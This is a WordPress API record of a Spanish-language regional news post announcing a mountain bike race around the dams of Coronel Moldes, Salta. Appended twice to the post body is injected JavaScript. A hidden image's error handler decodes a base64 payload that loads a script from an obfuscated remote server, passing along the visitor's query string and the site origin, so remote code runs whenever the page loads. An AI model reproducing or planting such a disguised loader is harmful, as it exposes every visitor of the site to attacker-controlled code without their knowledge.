{"id":1693,"date":"2022-10-28T10:37:36","date_gmt":"2022-10-28T13:37:36","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1693"},"modified":"2025-08-14T00:31:53","modified_gmt":"2025-08-14T03:31:53","slug":"mas-de-300-bikers-participaran-en-la-vuelta-a-los-diques","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1693","title":{"rendered":"M\u00e1s de 300 bikers participar\u00e1n en La vuelta a los Diques"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#503c03\"><em>El 30 de octubre en el municipio de Coronel Moldes se vivir\u00e1 una competencia de mountain bike en un circuito de 31 kil\u00f3metros que vincular\u00e1 los diques San Roque , Puerta de Diaz y Cabral Corral.<\/em><\/h4>\n\n\n\n<p>La segunda edici\u00f3n de \u201cLa Vuelta a los Diques\u00bb se desarrollar\u00e1 en Coronel Moldes el pr\u00f3ximo domingo 30, a partir de las 8:30, con largada y llegada en la &nbsp;Vieja Estaci\u00f3n de esa&nbsp;localidad del Valle de Lerma. La carrera ser\u00e1 &nbsp;en homenaje al profesor Antonio Ram\u00edrez &nbsp;por su trayectoria como formador &nbsp;y entrenador.<\/p>\n\n\n\n<p>Desde la organizaci\u00f3n, Grecia Correa y Willy Ortega &nbsp;del team Moldes Biker y junto al secretario de Gobierno del municipio Pablo Reynosa brindaron detalles del evento. Informaron que \u00abser\u00e1n 2 circuitos, para los m\u00e1s experimentados el recorrido ser\u00e1 de 31 kms, pasando por los diques San Roque, Puerta de Diaz y Cabral Corral hasta llegar a la Estaci\u00f3n de Coronel Moldes\u201d. El circuito de ciclo turismo \u201ccampeonato Infanto\u201d, ser\u00e1 &nbsp;desde las 15:00, para personas desde los 3 a\u00f1os hasta los 15. &nbsp;<\/p>\n\n\n\n<p>Por su parte la directora de Deportes de la secretaria de Deportes, Claudia V\u00e1squez &nbsp;invit\u00f3 a ciclistas de toda la provincia a &nbsp;sumarse a esta competencia deportiva y disfrutar de la naturaleza que ofrece Coronel Moldes. Tambi\u00e9n detall\u00f3 que son m\u00e1s de 27 categor\u00edas, destacando que ya se sumaron deportistas de Tucum\u00e1n, Catamarca, Jujuy, Chaco, Santiago del Estero y Bolivia.&nbsp;<\/p>\n\n\n\n<p>Las inscripciones se recibir\u00e1n hasta el viernes 28 de octubre en Bicicleter\u00eda Javi Paz Bike Service( Hipolito Yrigoyen 52) Panader\u00eda El Popular Santos (Cerrillos) y Aconcagua (Pellegrini 331, galer\u00eda Multiespacio). &nbsp;&nbsp;<\/p>\n\n\n\n<p>La carrera es organizada por el team Moldes Biker y cuenta con el acompa\u00f1amiento del municipio de Coronel Moldes y la Secretar\u00eda de Deportes de Salta. Del Lanzamiento tambi\u00e9n particip\u00f3 el profesor Antonio Ram\u00edrez y autoridades de Coronel Moldes.&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/mas-de-300-bikers-participaran-en-la-vuelta-a-los-diques-85736\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El 30 de octubre en el municipio de Coronel Moldes se vivir\u00e1 una competencia de mountain bike en un circuito de 31 kil\u00f3metros que vincular\u00e1 los diques San Roque , Puerta de Diaz y Cabral Corral. La segunda edici\u00f3n de \u201cLa Vuelta a los Diques\u00bb se desarrollar\u00e1 en Coronel Moldes el pr\u00f3ximo domingo 30, a [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1694,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[18],"tags":[],"class_list":{"0":"post-1693","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1693"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1693"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1693\/revisions"}],"predecessor-version":[{"id":7299,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1693\/revisions\/7299"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1694"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1693"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1693"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1693"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}